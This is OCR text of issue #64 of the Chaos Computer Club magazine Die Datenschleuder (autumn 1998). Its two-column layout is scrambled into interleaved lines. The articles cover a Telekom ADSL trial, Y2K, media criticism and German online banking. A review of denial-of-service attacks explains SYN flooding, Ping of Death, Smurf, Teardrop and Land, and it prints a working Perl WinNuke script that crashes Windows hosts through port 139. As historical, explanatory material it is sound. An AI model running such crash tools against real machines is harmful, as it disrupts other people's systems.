monatlich 48 DM GrundgebŸhr und da es bei der
Telekom Leute gibt, die so geistesgestšrt sind,
paketorientierten Datenverkehr auf einer
Standleitung nach /Nutzungszeit/ abzurechnen,
5 Pfennig die Minute. Das macht 72 Mark fŸr
einen Tag Internet, was immer noch unverschŠmt
teuer ist. Immerhin gibt es keine
InstallationsgebŸhr.
interhemd nerdwear
http://interhemd.prinz.org

Herbst 1998 Die Datenschleuder #64


Was bekommt man fŸr sein Geld? Allerlei
Gekabelse und Gedšnse, wobei das sicherlich
interessanteste der Metallklotz ist, der das ADSL-
Modem darstellt. "ORCKIT FastInternet ADSL"
steht drauf und auf der Vorderseite gibts einen
seriellen KonÞgurationsport. Auf der RŸckseite
gibt es den Power-Anschlu§ samt Schalter, einen
Line-Ausgang, sowie 10BaseT- und ATM-25-
AnschlŸsse samt TX- und RX-LEDs. Man kann
also das Teil mittels Xover-Kabel an eine
Ethernetkarte anschlie§en (beides mitgeliefert).
Dazu gibt es einen Bogen mit allerlei
KonÞgurationsinformationen. Der eigene
PC/Router und das ADSL-Modem liegen
gemeinsam in einem 255.255.255.252er Subnetz,
das nicht-routingfŠhige IP-Adressen hat. NAT bekommt. Immerhin gibt es einen Socks-Proxy.
gibt es nicht, man mu§ also Ÿber Proxys raus. Die Proxys liegen interessanterweise auf echten
Also ist das gar kein Internet, was man da Internet-Adressen (193.158.123.162).
Als Homepage soll man www.mmdp.de oder
jupiter.mmdp.de, wŠhlen, wo man dann mit
bandbreitenhungrigem Unsinn versorgt wird.
Public media should not Auf den lŠuft die ominšse FW-1 Software und
contain explicit or dahinter ein Apache 1.2.5 als Webcache. Das mag
ja alles noch Sinn machen. Der Hammer kommt
implied descriptions of allerdings, wenn man auf die Firewall zugreifen
will: Man mu§ sich mit Passwort und Usernamen
sex acts. Our society anmelden und dann soll darŸber zeitabhŠngig (!)
abgerechnet werden. Wie die Telekom das
should be purged of the machen will, ist allerdings schleierhaft.
perverts who provide the Mehr gibt es kaum zu berichten: Das ganze ist
ßott, erreicht zum Teil sogar die theoretisch
media with maximal mšgliche Bandbreite, allerdings ist im
Versuchsbetrieb die Bandbreite auf 2 MBit
pornographic material begrenzt.
while pretending it has
Doobee R. Tzeck
some redeeming social
value under the public's
'right to know'.“
Kenneth Starr, 1987
Interview by Dianne Sawyer

Die Datenschleuder #64 Herbst 1998


Jahrtausendendflügelfiguren

Die Industrie zittert, die Banken alle Jahreszahlen von null bis 29 im nŠchsten
bibbern und die TK-Anbieter Jahrtausend liegen und alle anderen in diesem, ist
legen von Panik getrieben Windows NT schlicht "nicht in allen
monströse Geldbeträge auf die Komponenten Y2K-compliant". Durch heftiges
hohe Kante. Diesen Eindruck Marketing sollen alle Kunden, die bisher NT
gewinnt man bei der Lektüre der einsetzen, zum Kauf der dann angeblich Y2K-
kompatiblen Version 5.0 des Betriebssystems
einschlägigen EDV-Literatur, wenn
bewegt werden.
es um das Thema Jahr 2000 geht. Die Streufolgen eines Ausfalls bei einem
System sind nahezu nicht vorauszusehen. Am

W as wirklich passieren wird, wissen nur die


Firmen, die es gewagt haben, ihr
Rechnerdatum testweise auf den 1. Januar 00 zu
heftigsten dŸrfte sich ein Ausfall kritischer
Infrastrukturkomponenten wie etwa des
Stromnetzes bemerkbar machen. LŠstig hieran
stellen. Die meisten dieser Versuche haben wŠre nicht nur ein Ausfall der Rechner, des Lichts
Handlungsbedarf an vorher nicht erwarteten und das Internets. Viele Gasheizungen z.B. haben
Stellen ergeben. eine elektrische Pumpe und funktionieren demzu-
Microcontroller in diversen GerŠten, folge ohne Strom nicht. Ein schšnes Beispiel fŸr
Steuerungen fŸr FahrstŸhle, Kontrollsysteme von Interdependence im Heimbereich.
Klimaanlagen, integrierte PCs in Das gerade im Bankenbereich und bei SAP-
Fertigungsanlagen, Steuerungssyteme fŸr Systemen die doppelte Belastung durch die Euro-
Hochregallager, automatisierte LKW- Umstellung und Y2K zu Problemen bei der
Flottensteuerungen Ð Ÿberall lauert das kleine SoftwarequalitŠt fŸhrt, scheint klar. Immerhin hat
Datumsteufelchen. Allein die schiere Menge der das deutsche Bruttosozialprodukt alleine durch
mšglichen Problemstellen au§erhalb der die Umstellung der fossilen SAP R/2-
Mainframewelt lŠ§t es mittlerweile Installationen auf R/3 noch einen krŠftigen
unwahrscheinlich erscheinen, da§ alles gut geht. Anstieg bis zur kritischen Marke vor sich.
Vorausschauende Firmen, die z.B. Unkonventionelle LšsungsansŠtze, wie etwa
Fertigungsanlagen herstellen, haben ihren der Vorschlag, einfach weltweit das Datum auf
Kunden schon mal ein mehrtŠgiges 1995 zurŸckzustellen dŸrften auch kaum weniger
Wartungsintervall ab dem 31.12.99 in den Probleme erzeugen. Die jŸngst von Historikern
Kalender gedrŸckt, um wenigstens die wirklich debattierte Erkenntnis, da§ die katholische Kirche
peinlichen Probleme beheben zu kšnnen. Eine in unsere Zeitrechnung die Jahre von 600 bis 900
Produktionspause, die man schon zwei Jahre zum Zwecke der Bereicherung durch
vorher einplanen kann, ist immerhin weniger UrkundenfŠlschung eingefŸgt hat, ist hier leider
schlimm als eine, die plštzlich und unerwartet auch nicht zielfŸhrend. Selbst wenn alle sich
auftaucht. darauf einigen kšnnten, diese 300 Jahre wieder
Bšse Zungen behaupten angesichts der aus der Zeitrechnung zu entfernen, hŠtten die
grassierenden Updatewelle, da§ die SchŠden Programme mit Datumsangaben von 1799 noch
durch hektisch mit der heissen Nadel gestrickte ganz andere Probleme.
Software wesentlich hšher ausfallen werden, als
alles, was die Datumsbyteschlammperei frank@ccc.de
verursacht hŠtte.
Microsoft schlŠgt wie Ÿblich alle Rekorde in
Dreistigkeit. WŠhrend Excel davon ausgeht, da§

Herbst 1998 Die Datenschleuder #64


Der kaputte Konr@d

Peter Glaser hat für die letzte


Ausgabe des Magazins Konr@d
auf Seite 112ff. einen ordinären
Artikel zusammengeschustert. Er
setzt sich mit den Hintergründen
auseinander, die zum Film „23“
geführt haben, der Anfang 1999
in die Kinos kommt.

V om Tod Hagbards zu schreiben "Er ...


illuminiert sich" ist eher marginal. †bler ist,
da§ Bertelsmann-Schreibsklave Peter Ÿber den
Strukturbegriff "Macht" in hoher Außage
feuilletonistisch schwadroniert und menschenver- seine technischen Basteleien "Hacker" zu nennen,
achtend wirkt. Keiner der namentlich Genannten wenn die Verwerßichkeit der Erpressung deutlich
bekam den Text vor Andruck zu sehen. Die von bleibt. Eine Haftstrafe geht ebenso vorbei wie
Konrad verbreiteten Falschbehauptungen und BewŠhrungsfristen. Die Zeit heilt viele Wunden
Verleumdungen kšnnen teuer werden. und auch Menschen verŠndern sich.
Peters Aufmacher "Der Film 23! dokumentiert" Geschichte Hagbards und VerŠnderungen
zeigt den Grundirrtum des ganzen Artikels auf. waren ein Diskussionsthema auf dem Chaos
Denn Filmemacher Hans-Christian Schmid hat Communication Congress 1997. So etwas
sehr sorgfŠltig Ÿber Hagbard recherchiert, aber darzustellen, ist mehr Arbeit als das
klargestellt, da§ er keinen DokumentarÞlm formuliermŠ§ig elegante ZusammenrŸhren von
macht, sondern die Geschichte eines Menschen Peters Bitquark. Genau wegen der Schwierigkeit,
mit den Mitteln des Films darstellt. ZeitablŠufe und Entwicklungen zu beschreiben,
Unterschiede zwischen Roman, Film und mšgen etliche Beteiligte und Betroffene im RL,
Reportage hat Peter Glaser zu kennen. Wer dem Real Life, nicht mehr mit den damaligen
Klarnamen nennt in Verbindung mit Spitznamen, Spitznamen genannt werden und schon gar nicht
hat GrundsŠtze journalistischer Sorgfalt in einer Massenpublikumszeitschrift aktuell
einzuhalten. Das tat Peter nicht. Er fragte keinen "geoutet" werden. Ein Aspekt fŸr diejenigen, die
der mit Klarnamen genannten Hacker zu weiterhin beim CCC sind, ist die Hackerethik als
Unterschieden zwischen privaten Erinnerungen, Orientierung . Dies nicht darzustellen, ist schŠbig.
Recherche und Drehbuch des Films, sondern Peter Glaser hat sechs Seiten Konrad gefŸllt. Das
rŸhrte alles zusammen. Menschlich verwerßich SahnehŠubchen unter dem Artikel ist die Zeile
dabei ist, da§ Peter die Mischung mit den "Der Autor ist selber Mitglied im Chaos
Klarnamen der noch lebenden Betroffenen Computer Club". Aus meiner persšnlichen Sicht
garnierte. †ber zehn Jahre sind vergangen und hat sich Peter Glaser mit seinem Geschmier vom
die Beteiligten haben daraus gelernt. Ich fŸr CCC verabschiedet. Denn nett sein allein genŸgt
meinen Teil habe "damals" den Fehler begangen, nicht, um zu einer galaktischen Vereinigung ohne
mich von einigen Hackern zu distanzieren, weil feste Strukturen zu gehšren: Intelligenz ist
fŸr mich die Hackerethik bereits damals zwingend erforderlich. Vielleicht Þndet Peter ein
verbindlich war; heute gehe ich damit Hirn-Update, um es dann nochmal versuchen.
differenzierter um. So habe ich bei einem
Erpresser wie Dagobert kein Problem, ihn fŸr wau@ccc.de

Die Datenschleuder #64 Herbst 1998


Nach uns der SYN-Flood!

Der Config-Port und die Firewall weiteren Hacks darstellen, wobei eventuelle
bieten sicher noch viel Raum zum ethische Bedenken noch auszudiskutieren wŠren.
experimentieren. Eine Art FŸr irgendwelche SpooÞng-basierten Angriffe
Jahresrückblick auf Internet- kann es unter UmstŠnden von Nutzen sein, wenn
basierte "Denial of Service"- ein bestimmter Rechner im Netz ausgefallen ist.
Attacken Als ein mšgliches Beispiel unter vielen wollen wir
hier nur mal das netzweite Sharing von Platten
oder Partitionen via NFS oder SMB zu bedenken

W enn es 1997 so etwas wie eine Top Ten


unter den SicheitslŸcken gegeben hat, dann
war der Superhit mit Sicherheit Denial of Service
geben: Wir schalten einen Rechner im LAN Ÿber
eine DoS-Attacke aus und kšnnen prima die
Platten mounten, auf die der Rechner vor seinem
oder kurz DoS. Im eigentlichen Sinne bedeutet Ableben Zugriff hatte. In niederlŠndischen
ein DoS-Angriff etwas unzugŠnglich machen, also Rechenzentren gab es so um 1993 herum verstŠrkt
Kaugummi ins Schlo§ stopfen, einem Leute, die einfach bei den SUN-Workstations den
Anrufbeantworter die Lieblingsplatte vorspielen Aus-Schalter betŠtigten, um sich dann auf einem
oder einen Geldautomaten mit der PC die interessanten NFS-Volumes zu mounten.
handgeschriebenen Notiz "Automat defekt, zieht Das war sozusagen Denial of Service nach
Karte ein" versehen. Im Computerbereich ist eine Hausmacherart.
DoS-Attacke meistens damit verbunden, da§ der Wir wollen uns allerdings mit einigen DoS-
Rechner ferngesteuert Ÿber das Internet (oder Attacken beschŠftigen, die im letzten Jahr so sehr
irgendein TCP/IP-Netzwerk) gecrasht oder sonst- Furore gemacht haben und alle zwei Kriterien
wie unbenutzbar gemacht wird. Gegen solche erfŸllen: Erstens kšnnen sie von au§en (also von
AbstŸrze gibt es selbst unter den einem beliebigen Punkt des Internets, nicht nur
sympathischeren Betriebssystemen wie Linux im LAN) den Rechner lahmlegen und zweitens
oder den BSD-Varianten oft kein Gegenmittel, da nutzen sie alle Bugs und SchwŠchen in der
diese Systeme eigentlich davon ausgehen, da§ TCP/IP-Implementation gŠngiger Betriebsysteme
sich der User zu benehmen wei§. Bei den aus. Interessant ist, da§ diese Angriffe
Microsoft-Systemen liegt die Sache etwas anders. Ÿberwiegend schon lŠnger bekannt waren, aber
Die Leichtigkeit, mit der sie durch DoS-Angriffe erst PopularitŠt erlangten, als DAU-feste
aus den Tritt gebracht werden kšnnen, lŠ§t in uns Programme auftauchten, mit denen man die Bugs
schon die Frage aufkommen, was sich Microsoft triggern konnte.
beim Design des TCP/IP-Stacks Ÿberhaupt
gedacht hat. Vermutlich gar nichts. SYN-Flooding
"Denial of Service"-Angriffe sind aus Im Herbst 1996 wurde das sogenannte "SYN-
verschiedenen GrŸnden interessant. Neben eher Flooding" relativ populŠr. Wie wir aus RFC 793
kindischen Rechtfertigungen wie Rache fŸr die im wissen oder zumindest wissen sollten, wird eine
IRC erfahrene
KrŠnkung der Basic 3-Way Handshake for Connection Synchronization
MŠnnerehre oder STATE STATE
Sabotage des TCP A TCP B
(ehemaligen)
1. CLOSED LISTEN
Arbeitgebers, 2. SYN-SENT --> <SEQ=100><CTL=SYN> --> SYN-RECEIVED
kšnnen sie auch 3. ESTABLISHED <-- <SEQ=300><ACK=101><CTL=SYN,ACK> <-- SYN-RECEIVED
4. ESTABLISHED --> <SEQ=101><ACK=301><CTL=ACK> --> ESTABLISHED
die Vorstufe zu 5. ESTABLISHED --> <SEQ=101><ACK=301><CTL=ACK><DATA> --> ESTABLISHED

Herbst 1998 Die Datenschleuder #64


Jahresrückblick „Denial Of Service“

TCP-Verbindung mit einem sogenannten "Three-


Way Handshake" aufgebaut (siehe Kasten).
Erst wird ein SYN-Paket gesendet, darauf wird
mittels eines SYN,ACK-Paketes geantwortet.
Dieses mu§ wiederum mittels ACK bestŠtigt
werden. WŠhrend des Verbindungsaufbaus wird
natŸrlich Speicher belegt. Beim SYN-Flooding
werden SYN-Requests mit nicht-existenter
Absenderadresse an das Opfer gesendet. Das
Opfer sendet eine SYN,ACK-Antwort an die
ungŸltige Absenderadresse, erhŠlt natŸrlich keine
Antwort und wartet erfolglos auf eine
RŸckmeldung. Nach einiger Zeit merkt das Opfer
natŸrlich, was da gespielt wird und der
Verbindungsversuch wird als erfolglos TCP und UDP. Der Phantasie sind keine Grenzen
abgebrochen deklariert. gesetzt.
Das Prinzip, auf dem SYN-Flooding beruht, ist Wie erzeugt man nun diese Ÿbergro§en Ping-
denkbar einfach: Wenn man nur schnell genug Pakete? Ein ordentlicher Ping Befehl sollte keine
die SYN-Pakete an das Opfer sendet, ist Pakete grš§er als 65507 Bytes zulassen. (65535 -
irgendwann der gesamte Speicher fŸr 20 IP-Header - 8 ICMP-Header) Wo Þndet man
Verbindungen belegt. Voraussetzung ist natŸrlich, am ehesten einen unordentlichen Ping-Befehl?
da§ man die Pakete schneller auf die Gegenseite Richtig, in den Betriebsystemen der Firma
schaufelt als der Timeout zuschlŠgt. Microsoft. Nach dem BetŠtigen von Windows-R
einfach "Ping -l 65510 opfer.org" eingeben und
Ping of Death sich das "Windows kann doch mehr"-Grinsen auf-
Das nŠchste gro§e Ereignis war "Ping of setzen.
Death". IP-Pakete kšnnen bis zu 65.535 Bytes lang Allerdings waren entsprechende Tools
sein, darin ist der IP-Header schon eingerechnet. natŸrlich auch schnell fŸr Linux et al. zur Hand
Pakete, die grš§er sind als das Transportmedium und der Linux-Kernel war auch nach 3 Stunden
es verkraftet, werden in Fragmente aufgeteilt und gepatcht und sicher.
beim EmpfŠnger wieder zusammengesetzt. Betroffen war so ziemlich alles, was IP fŠhrt, es
Die Zusammensetzung der Fragmente erfolgt sei denn, es basierte auf BSD. Im Gegensatz zu
anhand eines Offset-Wertes, der fŸr jedes SYN-Flooding und smurÞng, wo man einen
Fragment bestimmt, wo es denn hin soll. Dadurch konstanten Datenstrom erzeugen mu§te, um
ist es mšglich, dem letzten Fragment einen Offset anzugreifen, war Ping of Death die erste Attacke,
zu geben der zusammen mit der Fragmentgrš§e mit der man das Opfer mit einem einzigen
einen Wert grš§er als 65.535 Bytes ergibt und "Schu§" erlegen konnte.
irgendwelche 16-Bit ZŠhler oder Buffer
Ÿberlaufen lŠ§t und fŸr entsprechend Verwirrung Winnuke
sorgt. So ziemlich alles, was einen IP-Stack hatte, Am 7. Mai begann ein besonderer Spa§. Bisher
konnte betroffen sein: PCs, Workstations, Router, als Out of Band (OOB) Angriff bekannt, stieg die
Drucker, Kaffeemaschinen. Beliebtheit mit dem Programm winnuke rabiat
NatŸrlich kann man diesen Angriff nicht nur an. Wo man vorher selber basteln bemŸhen
mit ICMP und Ping machen, sondern auch mit mu§te, gab es jetzt ein DAU-festes Tool.

Die Datenschleuder #64 Herbst 1998


Es geht eine Träne auf Reisen…

Microsofts NetBIOS-Implementierung bekam, haben, die die Patches dagegen nicht installiert
sobald Daten eintrafen, die anders waren als die hatten und ewig an ihrer KonÞguration 'rum-
erwarteten, ganz heftig Schluckauf. Ein Connect schraubten; "Da stimmt was nicht mit den Netz-
auf werktreibern!"
Port 139, ein paar wirre Zeichen und schon
war der Spa§ vorbei. Gegen OOB war Ÿbrigens Smurf
auch der Microsoft DNS-Server sehr empÞndlich. Unter dem Namen ICMP Storm war das
Erschreckend an der Angelegenheit war die Problem schon lange bekannt. Aber erst das
unglaubliche PrimitivitŠt dieses Fehlers, so da§ DAU-feste Programm Smurf sorgte fŸr weite
man die FunktionalitŠt von winnuke in ein paar Verbreitung. Das war irgendwann im Oktober.
Zeilen selbst zusammenhacken konnte. Zur Smurf basiert auf auf dem alten
allgemeinen Außockerung implementieren wir Broadcastspielchen. Ein Ping auf eine
das ganze mal in Perl, wobei wir als Zugabe noch Broadcastadresse erzeugt eine ganze Menge
prŸfen, ob der Rechner nach dem Angriff auch Antworten. Ein ßood-ping auf eine
wirklich alle Viere von sich gestreckt hat, d.h. Broadcastadresse erzeugt jede Menge Verkehr.
nicht mehr per ICMP-ping erreichbar ist (siehe Wenn man nun die Absenderadresse des Pings
Programmlisting im Kasten). fŠlscht, bekommt das Opfer, dessen Adresse man
Winnuke fand vor allem unter IRC-Usern verwendet hat, die Antworten. Das Opfer
rasante Verbreitung. Da es Windows-Benutzer bekommt unter UmstŠnden soviel TrafÞc, da§ es
durchaus gewohnt sind, da§ ihre Kisten zusammenbricht. Das Ganze hŠngt sehr stark von
abschmieren, nahmen viele das ganze als gegeben der Anzahl der Rechner, die auf einen Broadcast
hin oder rochen erst nach sehr langer Zeit Lunte. antworten ab. Der Broadcast dient
Sogar auf dem CCC'97 soll es noch Leute gegeben gewisserma§en als VerstŠrker. Wenn ich 1000

#!/usr/bin/perl -w
use strict;
use Socket;
use Net::Ping;
require 5.004;
my $host = shift;
my $paddr = sockaddr_in(139, inet_aton($host));
print "Der Computer $host wird heruntergefahren...\n";
socket(NUKE, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or
print "Klappt nicht: $!\n", return;
connect(NUKE, $paddr) or print "Klappt nicht: $!\n";
send(NUKE, "Heil Eris! Ewig Heil Discordia!", MSG_OOB );
close(NUKE);
if ($>) {
print <<"MSG_END";
Ich konnte den OOB-Angriff landen. Leider hast du keine root-Rechte, deshalb
überprüfe bitte selbst mit ping(8), ob $host noch läuft.
MSG_END
} else {
sleep 3;
my $ping = new Net::Ping('icmp');
if ($ping->ping($host)) {
warn "Hmm... $host scheint noch zu laufen.\n";
} else {
print "Rechner wurde ausgeschaltet.\n"
}
}

Herbst 1998 Die Datenschleuder #64


…von Schlümpfen, Bomben und Landattacken

Pakete/s senden kann und 100 Rechner auf den


Broadcast antworten, erzeugt das beim Opfer
100.000 Pakete/s.
Mittels Smurf wurde der New Yorker Provider
Panix einige Tage sehr bedrŠngt. Das ganze lŠ§t
sich allerdings recht einfach bekŠmpfen, indem
man an den Routern IP-Broadcasts nicht mehr in
Ethernet Broadcasts umsetzt.

Teardrop
Teardrop tauchte in der ersten NovemberhŠlfte
auf. Es ist dem Ping of Death nicht unŠhnlich, da
es sich auch die Fragmentierung von IP-Paketen
zu nutze macht. Diesmal wird allerdings nicht
mittels Fragmentierung ein zu gro§es Paket Chatsysteme sind durch idiotensichere DoS-
erzeugt, sondern die Fragmente werden so Pogramme zum Sandkasten-Schlachfeld
erzeugt, da§ sie "Ÿberlappen", was Windows und geworden. Wenn man von den reihenweise mit
Linux zur Freude der restlichen Blue Screens abgerauchten NASA-Windowskisten
Betriebssystempropheten Ÿbelst aus dem Tritt hšrt, kann man sich wohl ein Grinsen nicht
bringt. Auf dem CCC'97 standen noch etliche verkneifen, aber ein echter, zufriedenstellender
Maschinen 'rum, die nicht gegen Teardrop Hack im Sinne der Hackerethik ist das wohl
gepatcht waren. Kusch, ab hinter die Firewall! nicht, wenn wir mal ehrlich sind.
Warum wir trotzdem einen †berblicksartikel
Land Ÿber Denial of Service fŸr diese Datenschleuder
Der letzte Schrei im DoS Bereich traf Ende geschrieben haben? Auf der Hand liegen GrŸnde
November ein: Land. Es handelt sich hierbei um wie "Information will frei sein" oder "Security
einen relativ komplexen Angriff. Dabei wird ein through obscurity funktioniert nicht" -- aber das
SYN-Paket erzeugt, bei dem EmpfŠnger- und wichtigste ist, da§ das berŸhmte Know-How bei
Absenderadresse/-port gleich sind. Das erzeugt, der ganzen Diskussion doch sehr unter zu fallen
wenn es an einen offenen Port gesendet wird, in scheint; sowohl bei den k00len Typen, die nicht
vielen IP-Stacks eine Race Condition und legt das wirklich durchschauen, was hinter ihrem
System lahm. Rundrum-sorglos-WinNuke steckt, als auch bei
Das interessante an Land war, da§ es auch der nicht-technisierten Normalbevšlkerung. Und
Cisco-Router, die an sehr vielen zentralen stellen wenn wir uns schon Ÿber fehlendes Know-How
des Netzes stehen, davon betroffen waren. Da beschweren: von dem Know-Why wollen wir gar
aber nach den StŸrmen der vorhergehenden nicht reden. Bitte kŸmmert euch umd das Know-
Monate viele Netze gegen spooÞng gesichert Why. Ihr schafft das schon.
waren, hielten sich die Auswirkungen in Grenzen.
Doobee R. Tzeck & Jens Ohlig
Fazit Chaos Computer Club Cologne
Im Prinzip sind fŸr uns nach der Betrachtung
dieser Attacken immer noch die gleichen Fragen
offen, die wir weiter oben als noch auszudiskutie-
ren bezeichnet haben. IRC oder sonstige

Die Datenschleuder #64 Herbst 1998


Deutsche Banken

Vertrauen ist der Anfang von sich die Branche darin, da§ man jetzt Personal
Allem. Diesen Slogan benutzt die einstellen mu§, weil die veranschlagte Personal-
Deutsche Bank schon seit langem decke nicht ausreichend dimensioniert ist. Der
nicht mehr. Mit dem Jahr 2000 Markt fŸr qualÞziertes EDV-Personal ist aber leer-
vor der Tür und dem Euro- gefegt. Wenn eine Bank heute Bank-Software kau-
Problem vor der Nase will sich fen mšchte, bekommt sie von allen Anbietern ein
mŸdes LŠcheln und die Aussage, da§ in diesem
auch innerhalb der Deutschen
Jahr da sicher nichts mehr zu machen sei. Man
Bank nicht so recht Vertrauen wŠre schon froh, wenn man bei den grš§eren
einstellen. Stammkunden die Euro-Problematik fristgemŠ§
gelšst bekŠme. ZusŠtzlich werden die Banken

S ollte sich das Bewu§tsein, da§ Ihr Geld nur


Bytes auf schlecht konÞgurierten, nur von
Software der ModernitŠtsklasse "COBOL '68 in
gerade auch an einer anderen Front beschossen:
ein Gerichtsurteil hat die Beweislast bei EC-

wurmzerfressenen Lochkartenstapeln"
zusammengehaltenen Datenbanken auf
jahrzehntealten BitfrŠsen sind, zu den Kunden
durchschleichen, kšnnten die GeschŠftssausichten
der GeldhŠuser deutlich sinken.
Da§ sein schwer errungenes Vermšgen
eigentlich nur noch existiert, weil die
Backupstrategien bisher nicht in grš§erem
Umfang versagt haben, ist dem normalsterblichen
HŠuslebauer schwer beizubringen. Die Banken
haben schlie§lich gelernt. Nachdem die ersten
wirklichen Probleme aufgetreten waren, haben
Schnelldrucker in den KellerrŠumen Einzug
gehalten, auf denen alle Transaktionen auf Papier
gebackupt werden. In IBMs Terminologie sind
das dann QuaternŠr-Speicher. Wie die dazugehš- Karten-Problemen umgekehrt (siehe Artikel in
rigen einhundert studentischen Datenerfassungs- dieser Ausgabe).
experten zum Wiedereintippen in IBM-Termino- Der HoffnungstrŠger der Branche, das
logie hei§en, war bisher nicht zu ermitteln. Onlinebanking, sieht auch nicht viel stressfreier
Die armen Banken sind ja auch gebeutelt. aus. HBCI ist die Antwort des ZKA zum Thema
Nachdem sie die Jahr-2000-Problematik einige "Sicherheit vom Online-Banking". Das ZKA ist
Jahre lang einfach ignoriert haben ("wir haben ja der "Zentrale Kreditausschu§", sozusagen das
noch genŸgend Zeit"), und jetzt plštzlich und PolitbŸro der Branche. Hier werden Inter-Banken-
unerwartet die Euro-Problematik auf die Banken Angelegenheiten geklŠrt.
zukam, gibt es jetzt auch noch unerwŸnschte HBCI ist der Versuch des ZKA, einen
Presseberichte zum Thema "Sicherheit des bankenunabhŠngigen Standard fŸr sichere
Onlinebankings". Mit hŠ§lichen Worten wie Online-Transaktionen zu schaffen. Von allen
"Virus" und "Trojanisches Pferd" wird doch nur technisch mit der Umsetzung von HBCI befassten
wieder Verunsicherung in die Kunden hineingere- Leuten hšrt man dazu nichts als unterdrŸckte
det, so der Branchentenor. Erstaunlich einig ist

Herbst 1998 Die Datenschleuder #64


...im Internet-Zeitalter

Seufzer und Sto§gebete, die im wesentlichen das


baldige Ende des ZKA herbeisehnen.
Kennzeichnend fŸr den technischen Weitblick
hinter der SpeziÞkation sind Zitate wie: "wegen
der zunehmenden Bedeutung des Internet [wird]
neben T-Online auch TCP/IP [berŸcksichtigt]".
Wer etwa versucht, Ÿber HBCI Bšrsen-Trans-
aktionen durchzufŸhren, wird in den etliche
hundert Seiten starken Dokumenten vergeblich
nach einem Messaging-Standard fŸr derartiges
suchen. Der Standard enthŠlt keinerlei Features,
die es wahrscheinlich erscheinen lassen, da§ er
au§erhalb Deutschlands Ÿberhaupt wahr-
genommen werden wird.
Viele der deutschen Banken betrachten Chipkarte vorerst nur unter Windows verfŸgbar
mittlerweile das ZKA und die von diesem sein.
Komitee entworfenen Projekte (wie z.B. auch die †brigens sei an dieser Stelle betont, da§ HBCI
Geldkarte) als geschŠftsschŠdigend. †ber eine noch sehr modern ist! Von allen deutschen
Integration von HBCI mit international Banken machen genau zwei ihr Internet-Banking
verbreiteten Systemen wie OFX/Gold wird nicht Ÿber einen BTX-Tunnel! So erklŠren sich
offenbar nur bei Firmen diskutiert, die mit der auch die "Bitte warten, Verbindung wird
konkreten Umsetzung der technischen Infra- aufgebaut" Meldungen in der Statuszeile.
struktur befa§t sind. Immerhin basiert die Sicher- Das liegt gar nicht mal daran, da§ die Banken
heit von HBCI auf so "zukunftstrŠchtigen" Algo- so uninteressiert sind, sondern an der generellen
rithmen wie 56-bit DES. Wieviel das ZKA vom SchwerfŠlligkeit der Geldinstitute. Das zeigt sich
Internet versteht und welchen Stellenwert dem unter anderem, wenn man mit Herstellern von
zugemessen wird, lŠ§t sich leicht auf deren Web Geldautomaten redet, wie z.B. NCR oder IBM.
Server unter http://www.zka.de/ betrachten (da Diese Hersteller zeigen auf den einschlŠgigen
lŠuft Ÿbrigens auch ein minderfrisches sendmail). Messen jŠhrlich revolutionŠre Neuerungen;
Ein weiterer Hinweis auf die Internet- Automaten, an denen man auch Kontotransaktio-
Kompetenz der HBCI-Macher ist, da§ HBCI den nen machen kann, Automaten mit Internet-
Port 3000 benutzt, d.h. Standard-Firewalls, die Zugang, mit Briefmarkenverkauf, mit Biometrik,
nur Web-TrafÞc (Port 80 und 443) herauslassen, mit Stimmerkennung. Die Banken-Abgesandten
und auch nur Ÿber den Proxy-Server, werden freuen sich immer wieder darŸber, machen gro§e
HBCI-Banking nicht durchfŸhren kšnnen. Andere Augen, aber gekauft werden solche Automaten
Banken lšsen dieses Problem, indem sie Port 443 frŸhestens 5-10 Jahre spŠter. Die Banken ersticken
auf einem Server benutzen, auf dem dort eben einfach in ihrer selbstverursachten LŠhmung,
kein https- sondern ein Banking-Server lŠuft. verursacht durch Management, Ausschu§-
Weiterhin sieht HBCI als Authentisierungs- grŸndung und BŸrokratie, und so ist auch die
methode einen Chipkartenleser und/oder eine Euro- und Y2K-Panik jetzt kurz vor Torschlu§ zu
Diskette mit Geheimdaten vor, auf die Java natŸr- erklŠren.
lich nicht betriebssystemŸbergreifend zugreifen Und wenn man so marktunfŠhig, so gelŠhmt,
kann. D.h. Online-Banking wird mit HBCI und viel zu hohe Kosten verursacht und im internatio-
nalen Vergleich nicht konkurrenzfŠhig ist, stellt

Die Datenschleuder #64 Herbst 1998


Jeden Tag...

sich die Frage, warum es in Deutschland keine vor kurzem ein Jahr-2000-Þx heraus. Das
anstŠndigen Banken aus dem Ausland gibt. Die Protokoll wird normalerweise mit 56-Bit DES
Antwort ist, da§ das deutsche Bankengesetz das verschlŸsselt. Ja, genau das 56-Bit DES, das vor
bisher auf DrŠngen der Banken hin einfach verbo- kurzem in drei Tagen geknackt wurde und das
ten hat. die US-Regierung jetzt fŸr hinreichend knackbar
Wenn man eine neue Bank anmelden mšchte, hŠlt, da§ es international fŸr den Export
dann macht die zustŠndige Behšrde die freigegeben wurde. Somit ist die Verbindung des
Zulassung von der Meinung des ZKA abhŠngig, Internet-Kunden, der sich per 128bit-SSL bei
wo ja, wie wir schon gesagt haben, die ganzen seiner Bank einwŠhlt, um die Gasrechnung zu
anderen Banken sitzen. D.h. am Ende bestimmen begleichen, rein kryptographisch um den Faktor
die anderen Banken, ob sie gerne Konkurrenz 2^72 besser geschŸtzt als die internationalen
haben mšchten oder nicht. Allerdings wird sich Millionentransfers.
das im Rahmen der EU Šndern. Die Deutsche Bank hat
Die Banken werden sich dann beispielsweise in Ihren Konto-
auf andere Weise als Monopol nummern nicht die konto-
versuchen, so wie sie jetzt fŸhrende Filiale kodiert,
schon die europŠische obwohl das ja wohl eine offen-
Niederlassung der NASDAQ, sichtliche Funktion wŠre.
die EASDAQ, boykottieren. TatsŠchlich ist es einem
Langfristig ist die Lage aller- Mitarbeiter nicht mšglich,
dings vollstŠndig aussichtslos, anhand einer Kontonummer zu
die deutsche Bank macht auch erkennen, wo er denn genau
nicht durch ihre Kunden, anrufen soll, wenn ihm die
sondern durch ihre Immo- Filiale nicht zufŠllig bekannt ist.
biliengeschŠfte Gewinne. Wer Au§erdem war die Software
an der Bšrse spekuliert, sollte nicht ßexibel genug, die Filialen
sich dringend noch vor dem im Osten und Westen
Jahre 2000 von seinen Bank- Deutschlands zusammenzu-
Aktien trennen oder deutsche fŸhren, also haben bei den
Bank-Aktien sogar shorten deutschen Gro§banken Osten
oder putten. und Westen verschiedene
Um unsere Kritik zu verstehen, mu§ man Bankleitzahlen.
einen Einblick in die grausigen Protokolle und †berhaupt zieht sich das Konzept der
Software-Datenhaufen bekommen, mit denen es DatenbankschlŸssel immer wieder durch die
